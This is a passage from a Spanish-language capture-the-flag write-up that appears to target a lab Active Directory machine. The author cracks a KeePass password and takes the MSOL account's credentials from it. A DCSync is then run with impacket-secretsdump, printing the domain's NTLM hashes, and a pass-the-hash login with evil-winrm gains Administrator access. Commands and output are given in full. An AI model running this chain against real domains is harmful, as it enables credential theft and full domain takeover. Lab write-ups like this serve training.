[+] Words tested: 5/10 - Attempts per minute: 0 - Estimated time remaining: Calculating...
[+] Current attempt: 8E181E5F!@1
[*] Password found: 8E181E5F!@1
Abro la base de datos KeePass con el gestor KeePassXC introduciendo la contraseña 8E181E5F!@1
Consigo obtener la contraseña del usuario MSOL, la cual es YRax2Ry8g2ITQ3hpRPze
Intento acceder con el usuario MSOL mediante evil-winrm, pero no es posible ya que no pertenece el grupo Remote Management Users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
*Evil-WinRM* PS C:\Users\toolsdb\Documents> net user MSOL
User name MSOL
Full Name MSOL
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 31/10/2024 18:18:58
Password expires Never
Password changeable 01/11/2024 18:18:58
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
Privilege escalation
En BloodHound observo que el usuario MSOL tiene permisos sobre la mayoria de los objetos del dominio
Observo que el usuario MSOL puede realizar un DCSync Attack sobre el controlador de dominio, esto permite hacerse pasar por el DC y solicitar información sensible, por ejemplo los hashes de las contraseñas de los usuarios
Utilizo impacket-secretsdump para extraer los hashes de las contraseñas de los usuarios del controlador de dominio
1
2
3
4
5
6
7
8
9
10
impacket-secretsdump MSOL:'YRax2Ry8g2ITQ3hpRPze'@WIN-C73PROQLRHL.cons.thl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5d48bcf84aea999fb1ade06970a81237:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a6c4014f622dcadd4ec24cec540aaa86:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Obtenidos los hashes podría realizar un Pass The Hash (PtH) con evil-winrm y ganar acceso como usuario Administrator
1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i cons.thl -u Administrator -H 5d48bcf84aea999fb1ade06970a81237
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cons\administrator